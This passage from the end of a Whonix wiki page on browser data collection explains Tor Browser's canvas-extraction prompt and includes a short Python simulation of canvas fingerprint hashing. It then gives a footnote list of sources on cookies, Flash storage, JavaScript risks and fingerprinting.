Tor Browser has been patched to prompt before returning valid image data to the Canvas APIs. By default, if the site has not been given previous permission to extract canvas image data, then white image data is returned to the JavaScript APIs. Third parties are not allowed to extract canvas image data at all.
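The hashing step in the quoted description, and the effect of returning white image data, can be sketched as below. This is a simulation under stated assumptions rather than real browser code: `render` is a hypothetical stand-in for drawing to a canvas, a single byte models the subtle rendering differences between machines, and SHA-256 is an arbitrary choice of hash.

```python
import hashlib

WIDTH, HEIGHT = 4, 4  # tiny hypothetical canvas, RGBA with 4 bytes per pixel


def fingerprint(pixels: bytes) -> str:
    """Hash the extracted image buffer (SHA-256 is an assumed choice)."""
    return hashlib.sha256(pixels).hexdigest()


def render(antialias_shade: int) -> bytes:
    """Stand-in for canvas rendering; one byte models per-machine differences."""
    buffer = bytearray(b"\x00\x00\x00\xff" * (WIDTH * HEIGHT))
    buffer[0] = antialias_shade
    return bytes(buffer)


def blank_canvas() -> bytes:
    """All-white image data, as returned when extraction is not permitted."""
    return b"\xff" * (WIDTH * HEIGHT * 4)


machine_a = fingerprint(render(120))
machine_b = fingerprint(render(121))
print(machine_a != machine_b)                                       # True
print(fingerprint(blank_canvas()) == fingerprint(blank_canvas()))   # True
```

A one-byte difference in the rendered buffer yields a completely different hash, whereas every browser that returns the same white data produces the same hash and so cannot be told apart by this method.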

When browsing, if a prompt appears with a message like that below, it is recommended to decline the request.

This website (github.com) attempted to extract HTML5 canvas image data, which may be used to uniquely identify your computer.

Should Tor Browser allow this website to extract HTML5 canvas image data?

License

Gratitude is expressed to JonDos for permission to use material from their website. [46] The DataCollectionTechniques page contains content from the JonDonym documentation DataCollectionTechniques page.

Footnotes

  1. https://en.wikipedia.org/wiki/HTTP_cookie
  2. https://en.wikipedia.org/wiki/HTTP_cookie
  3. They also have legitimate functions such as keeping users logged into specific accounts.
  4. https://en.wikipedia.org/wiki/HTTP_ETag
  5. http://cyberlaw.stanford.edu/blog/2011/08/tracking-trackers-microsoft-advertising
  6. http://www.popularmechanics.com/technology/security/how-to/a6134/what-are-flash-cookies-and-how-can-you-stop-them/
  7. https://www.ghacks.net/2007/05/04/flash-cookies-explained/
  8. In Linux, LSOs are normally stored in:
    • ~/.macromedia/Flash_Player/#SharedObjects/
    • ~/.macromedia/Flash_Player/macromedia.com/support/flashplayer/sys/
  9. https://en.wikipedia.org/wiki/Flash_cookies
  10. Set dom.storage.enabled to false.
  11. https://nakedsecurity.sophos.com/2017/10/30/firefox-takes-a-bite-out-of-the-canvas-super-cookie/
  12. Users should never rely on DNT preferences, since they are rarely respected by industry.
  13. https://www.digitaltrends.com/computing/history-of-cookies-and-effect-on-privacy/
  14. https://www.digitaltrends.com/computing/history-of-cookies-and-effect-on-privacy/
  15. In short, JavaScript is not part of the Java platform and is a scripting language, while Java is an object-oriented programming language. The Java plugin is bundled with the Java runtime and runs inside the browser, allowing Java code to run inside a client's browser process.
  16. https://gizmodo.com/why-are-javascript-attacks-so-dangerous-1453269240
  17. Refer to the following ip-check.info anonymity test to view some sample values which can be gathered via JavaScript (if enabled).
  18. ip-check.info returns some false values and confuses TBB users
  19. https://www.sophos.com/en-us/security-news-trends/security-trends/malicious-javascript.aspx
  20. http://worldcomp-proceedings.com/proc/p2016/SAM9734.pdf
  21. https://en.wikipedia.org/wiki/Cross-site_scripting#Related_vulnerabilities
  22. 82% of malicious sites are hacked legitimate ones
  23. Sandbox implementation errors can also lead to JavaScript running outside of the sandbox and with elevated privileges, e.g. to create or delete files.
  24. https://freedom-to-tinker.com/2017/11/15/no-boundaries-exfiltration-of-personal-data-by-session-replay-scripts/
  25. This includes the usual privacy offenders such as microsoft.com, skype.com and adobe.com, along with various sites providing banking, media, torrenting, educational, telecommunications, forums, shopping, and anti-virus services.
  26. https://freedom-to-tinker.com/2017/11/15/no-boundaries-exfiltration-of-personal-data-by-session-replay-scripts/
  27. Reinforcing the perception that the private sector really is a comfortable and principal ally in the surveillance-industrial complex.
  28. For instance, the EasyList and EasyPrivacy blocking lists that are available in popular extensions. However, they did not block all the major companies at the time of writing.
  29. See also Tor Browser disabling JavaScript anonymity set reduction.
  30. https://www.eff.org/deeplinks/2010/05/every-browser-unique-results-fom-panopticlick
  31. Supercookie test, hash of canvas fingerprint, screen size and color depth, browser plugin details, time zone, DNT header enabled, HTTP_Accept headers, hash of WebGL fingerprint, language, system fonts, platform, user agent, touch support, cookies enabled.
  32. https://33bits.wordpress.com/about/
  33. https://wiki.mozilla.org/Fingerprinting
  34. https://panopticlick.eff.org/browser-uniqueness.pdf
  35. Many require active JavaScript code.
  36. https://wiki.mozilla.org/Fingerprinting
  37. Research suggests this is useful for profiling and tracking Internet users, as it reveals 10.5 bits of identifying information on average. This means that only about one browser in 1,500 shares the same User Agent (2^10.5 ≈ 1,448).
  38. In Tor Browser, Torbutton reduces the available entropy by quantising AvailWidth and AvailHeight, and setting the actual Width and Height to the values of AvailWidth and AvailHeight.
  39. Torbutton automatically disables many types of active content.
  40. https://blog.torproject.org/effs-panopticlick-and-torbutton
  41. Privoxy manipulates cookies and modifies web page data and HTTP headers before the page is rendered.
  42. http://accc.uic.edu/answer/what-my-ip-address-mac-address
  43. https://en.wikipedia.org/wiki/Canvas_element
  44. https://tor.stackexchange.com/questions/4029/html-5-canvas-imagedata-extraction-what-does-it-actually-mean
  45. https://www.torproject.org/projects/torbrowser/design/
  46. Broken link: https://anonymous-proxy-servers.net/forum/viewtopic.php?p=31220#p31220


Whonix is a licensee of the Open Invention Network. Unless otherwise noted, the content of this page is copyrighted and licensed under the same Libre Software license as Whonix itself. (Why?)